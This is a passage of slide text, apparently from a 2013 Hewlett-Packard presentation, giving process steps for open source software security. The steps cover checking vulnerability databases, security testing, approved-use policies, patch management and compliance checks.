    herein is subject to change without notice. 81 Step 2: Assess OSS for vulnerabilities / fix issues 2.1 Evaluate the open source code used in your enterprise for vulnerabilities –  Community bug tracking system and mailing lists –  BugTraq (www.securityfocus.com) –  MITRE’s Common Vulnerability and Exposures (CVE) (cve.mitre.org) –  Open Sourced Vulnerability Database (http://www.osvdb.org) –  National Vulnerability Database (http://nvd.nist.gov) 2.2 Security Testing –  Automated Static, Dynamic, and Runtime Analysis for OSS Components –  Manual Code Review 2.3 Fixing vulnerabilities –  Ask the open source community to fix them –  Fix them yourself
  82. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 82 Step 3: Develop open source usage policies 3.1 Establish a policy on acceptable open source usage within your enterprise –  Using your inventory and risk assessments, generate a list of approved OSS –  OSS should be maintained in an internal repository –  Create the processes to update and maintain the repository 3.2 Communication –  Project managers –  Developers –  Testers –  Architects –  Application owners
  83. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 83 Step 4: Develop a patch management process 4.1 Don’t forget to include OSS in your patch management process –  When new vulnerabilities are identified: •  Explore possible mitigation strategies to implement until patch is available •  Once released, inform your development teams •  Make sure there is a patch plan in place
  84. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 84 Step 5: Create a compliance gate 5.1 Compliance validation for the OSS usage policy –  Add a compliance check to any existing security or verification steps in your SDLC –  Periodic compliance checks
  85. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. Thank you!
  86. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. Security for the new reality